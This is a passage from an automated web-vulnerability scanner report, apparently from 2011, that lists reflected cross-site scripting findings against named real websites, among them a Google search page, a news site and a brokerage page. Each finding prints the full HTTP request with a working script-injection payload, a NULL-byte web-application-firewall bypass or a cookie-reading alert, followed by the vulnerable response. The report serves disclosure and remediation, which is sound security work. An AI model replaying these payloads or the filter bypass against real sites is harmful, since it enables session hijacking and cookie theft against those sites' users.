The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8d08"%3balert(1)//c9371ab82a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e8d08";alert(1)//c9371ab82a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Default.aspx?e8d08"%3balert(1)//c9371ab82a8=1 HTTP/1.1
Host: www.chasemilitary.com
Proxy-Connection: keep-alive
Referer: http://www.chasemilitary.com/?8517f%22%3balert(document.cookie)//55b2694a95c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=OVMPLYSilkbyCKKWU; ASP.NET_SessionId=jqii4q45b3tjcm45z5wnoz45; __utmz=182020341.1296685136.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; __utma=182020341.2094967643.1296685136.1296685136.1296685136.1; __utmc=182020341; __utmb=182020341.1.10.1296685136

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68609
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 00:07:27 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-equiv
...[SNIP]...
'false',
allowScriptAccess: 'always',
wmode: 'window'
};
var flashvarsADA = {}
flashvarsADA.adaLink = "Default.aspx?ada=true%26E8D08";ALERT(1)//C9371AB82A8=1%26";
var attributes = false;
swfobject.embedSWF('http://www.chasemilitary.com/swf/ADAredirect.swf', 'ada', '0.5', '0.5', '8.0.0', false, flashvarsADA, paramsADA, attributes
...[SNIP]...

2.97. http://www.google.com/advanced_search [hl parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.google.com
Path:   /advanced_search

Issue detail

The value of the hl request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload bdade(a)d80aea01345 was submitted in the hl parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advanced_search?q=ipboard+software&hl=enbdade(a)d80aea01345&prmd=ivns HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:09:09 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visited{color:#000}.ts td,.
...[SNIP]...
alse,{'cause':'defer'});}if(google.med) {google.med('init');google.initHistory();google.med('history');}google.History&&google.History.initialize('/advanced_search?q\x3dipboard+software\x26amp;hl\x3denbdade(a)d80aea01345\x26amp;prmd\x3divns')});if(google.j&&google.j.en&&google.j.xi){window.setTimeout(google.j.xi,0);}</script>
...[SNIP]...

2.98. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.google.com
Path:   /advanced_search

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f394a(a)d2919261fa0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advanced_search?f394a(a)d2919261fa0=1 HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:08:40 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visited{color:#000}.ts td,.
...[SNIP]...
t()});
})();
;}catch(e){google.ml(e,false,{'cause':'defer'});}if(google.med) {google.med('init');google.initHistory();google.med('history');}google.History&&google.History.initialize('/advanced_search?f394a(a)d2919261fa0\x3d1')});if(google.j&&google.j.en&&google.j.xi){window.setTimeout(google.j.xi,0);}</script>
...[SNIP]...

2.99. http://www.google.com/advanced_search [prmd parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.google.com
Path:   /advanced_search

Issue detail

The value of the prmd request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a960d(a)ecab87e67a8 was submitted in the prmd parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advanced_search?q=ipboard+software&hl=en&prmd=ivnsa960d(a)ecab87e67a8 HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:09:14 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visited{color:#000}.ts td,.
...[SNIP]...
'});}if(google.med) {google.med('init');google.initHistory();google.med('history');}google.History&&google.History.initialize('/advanced_search?q\x3dipboard+software\x26amp;hl\x3den\x26amp;prmd\x3divnsa960d(a)ecab87e67a8')});if(google.j&&google.j.en&&google.j.xi){window.setTimeout(google.j.xi,0);}</script>
...[SNIP]...

2.100. http://www.google.com/advanced_search [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.google.com
Path:   /advanced_search

Issue detail

The value of the q request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 4db85(a)700ed73b9bc was submitted in the q parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advanced_search?q=ipboard+software4db85(a)700ed73b9bc&hl=en&prmd=ivns HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:09:05 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visited{color:#000}.ts td,.
...[SNIP]...
e){google.ml(e,false,{'cause':'defer'});}if(google.med) {google.med('init');google.initHistory();google.med('history');}google.History&&google.History.initialize('/advanced_search?q\x3dipboard+software4db85(a)700ed73b9bc\x26amp;hl\x3den\x26amp;prmd\x3divns')});if(google.j&&google.j.en&&google.j.xi){window.setTimeout(google.j.xi,0);}</script>
...[SNIP]...

2.101. http://www.google.com/images [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.google.com
Path:   /images

Issue detail

The value of the q request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 6e290(a)d4e0b417516 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images?q=ipboard+software6e290(a)d4e0b417516&um=1&ie=UTF-8&source=og&sa=N&hl=en&tab=wi HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:11:25 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>ipboard software6e290(a)d4e0b417516 - Google Search</title><script>window.google={kEI:"vQBKTbagDIGglAfU_Nz9
...[SNIP]...
location.hash;if(a&&a.indexOf("start")>-1){var b=window.dyn.setResults;window.dyn.setResults=function(){window.dyn.setResults=b}}}v();
}) ();dyn.initialize('\x26prev\x3d/images%3Fq%3Dipboard%2Bsoftware6e290(a)d4e0b417516%26um%3D1%26hl%3Den%26sa%3DN%26tbs%3Disch:1\x26ei\x3dvQBKTbagDIGglAfU_Nz9Dw',0,1);dyn.setResults([]);</script>
...[SNIP]...

2.102. http://www.invisionpower.com/products/board/features/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.invisionpower.com
Path:   /products/board/features/

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 95e51--><a>1fddadebe75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /products/board/features/?95e51--><a>1fddadebe75=1 HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:01 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=75d748bd55859c58635f5c6022ec9255; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 01:16:01 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16435

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
<!-- ?95e51--><a>1fddadebe75=1 -->
...[SNIP]...

2.103. http://www.invisionpower.com/products/nexus/features/store.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.invisionpower.com
Path:   /products/nexus/features/store.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5e722--><a>6ccf7c9b600 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /products/nexus/features/store.php?5e722--><a>6ccf7c9b600=1 HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:14 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=afd5acf1c08a7662de6d8859ba720860; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 01:16:14 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 14878

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
<!-- store?5e722--><a>6ccf7c9b600=1 -->
...[SNIP]...

2.104. http://www.jpost.com/ArtsAndCulture/FoodAndWine/Article.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jpost.com
Path:   /ArtsAndCulture/FoodAndWine/Article.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 41326><script>alert(1)</script>d2be1bfeaa9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ArtsAndCulture/FoodAndWine/Article.aspx?id=203979&41326><script>alert(1)</script>d2be1bfeaa9=1 HTTP/1.1
Host: www.jpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:17:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=sgl5a4ygdcxxmom2wnek3a45; path=/; HttpOnly
Content-Type: text/html; charset=utf-8
Content-Length: 117507
Accept-Ranges: bytes
Cache-Control: private, max-age=420
Age: 0
Expires: Thu, 03 Feb 2011 01:24:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="ctl00_He
...[SNIP]...
<iframe src=http://www.facebook.com/plugins/like.php?href=http://www.jpost.com/ArtsAndCulture/FoodAndWine/Article.aspx?id=203979&41326><script>alert(1)</script>d2be1bfeaa9=1&amp;layout=button_count&amp;show_faces=true&amp;width=150&amp;action=recommend&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:150px; h
...[SNIP]...

2.105. http://www.learningsolutions.com.hk/index.php [Itemid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.learningsolutions.com.hk
Path:   /index.php

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f639"><script>alert(1)</script>217975010b0 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?option=com_content&task=view&id=7&Itemid=133f639"><script>alert(1)</script>217975010b0 HTTP/1.1
Host: www.learningsolutions.com.hk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:56:58 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: f6f411d73f2e572e53afd5afb059105f=-; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 01:56:57 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 01:56:57 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 01:56:58 GMT; path=/
Last-Modified: Thu, 03 Feb 2011 01:56:58 GMT
Connection: close
Content-Type: text/html
Content-Length: 32190


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<title>Learning Solutio
...[SNIP]...
<a href="http://www.learningsolutions.com.hk/index.php?option=com_content&amp;task=view&amp;id=7&amp;Itemid=133f639"><script>alert(1)</script>217975010b0&amp;lang=en">
...[SNIP]...

2.106. http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.macaudailytimes.com.mo
Path:   /times-lab/21109-Tragedy-our-Commons.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdaa0'-alert(1)-'045651d38d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /times-lab/21109-Tragedy-our-Commons.html?bdaa0'-alert(1)-'045651d38d6=1 HTTP/1.1
Host: www.macaudailytimes.com.mo
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:17:24 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: VivvoSessionId=378925c14d4a02242aec2; path=/; domain=.macaudailytimes.com.mo
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: VivvoSessionId=378925c14d4a02242aec2; expires=Fri, 04-Feb-2011 01:17:24 GMT; path=/; domain=.macaudailytimes.com.mo
Connection: close
Content-Type: text/html
Content-Length: 49361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
   <he
...[SNIP]...
ytimes.com.mo/index.php', {
                   parameters: {
                       action: 'comment',
                       cmd: 'proxy',
                       pg: pg,
                       CURRENT_URL: 'http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html?bdaa0'-alert(1)-'045651d38d6=1',
                       article_id: 21109,
                       template_output: 'box/comments'
                   }
               });
           }
       </script>
...[SNIP]...

2.107. http://www.merrilledge.com/m/pages/self-directed-investing.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.merrilledge.com
Path:   /m/pages/self-directed-investing.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007604f"><script>alert(1)</script>840cc046a86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7604f"><script>alert(1)</script>840cc046a86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /m/pages/self-directed-investing.aspx?%007604f"><script>alert(1)</script>840cc046a86=1 HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=FwKDfC5UaLvLmPA3/vdE3wVpJbCYF6aoq9ME4h10pHxdFOeTDBIFhxyADd5fHRG65hHfGJnE5rUpfugYtnkgKWMr4wEEjdCU9Zeyv9c9nyuZ9ajXGLsX6wSBI4PRGuqZeffWAWD8TXDbIejjTvCYkbFov2pPkDo+gDEnwFEI4CKbgc+L6yLHjiunniusE7RlQufJTarN0GcAtdKb0W7NxlR8mE+atUu/k7IFRG3ALXC9MewlqNy49LG2cQoAUl8hoyfFHWrpqsEBj570XPZKezKTMIhDfhzgU1ooRdm+jCcmZUb3cuAe9m+Acdd3UnOmIrVunF9zamI568Sqy7ySY7T54DOMkcgNVQ/SXf1jZEzIkIBDE6gZzJDZXFDkLrWemEpbDdnvp7v6cN/9D72eweH6lbkKrMA4dfwxzBvTvsRN71v84qFbr0LNHCv0nk5G1xNzc5lJyLJli5QWgXz6Cy7MP4dsw/2LDub5gP+f3mMv3R/msQI9r34FCNsp6P570jCzZMWMAG7tgAVspoHw/rIQin6C0ulXdk/Y/s6Pc/XZ5HvWqcsg8wBqs/J6kvZTPGA5c2xH0edEWiYxfHviEOTdeYXU3ofRPSUF09eXe4OA5fabdRVOaq0LmIWGhcFP; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=48fba909101349b2b1f5d2e57c206442; domain=.merilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 99577


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...
<a href="../System/SearchResults.aspx?.7604f"><script>alert(1)</script>840cc046a86=1&k=" id="ctl00_ECMSSearchTextBox1_srchAnchor1" class="btn" onclick="return objSearchWidgetLibrary.onsearchclick1('ctl00_ECMSSearchTextBox1_srcText','ctl00_ECMSSearchTextBox1_srchAnchor1')">
...[SNIP]...

2.108. http://www.merrilledge.com/m/pages/self-directed-investing.aspx [src_cd parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.merrilledge.com
Path:   /m/pages/self-directed-investing.aspx

Issue detail

The value of the src_cd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0013948'%3bf91d272c668 was submitted in the src_cd parameter. This input was echoed as 13948';f91d272c668 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /m/pages/self-directed-investing.aspx?src_cd=BAC1%0013948'%3bf91d272c668 HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
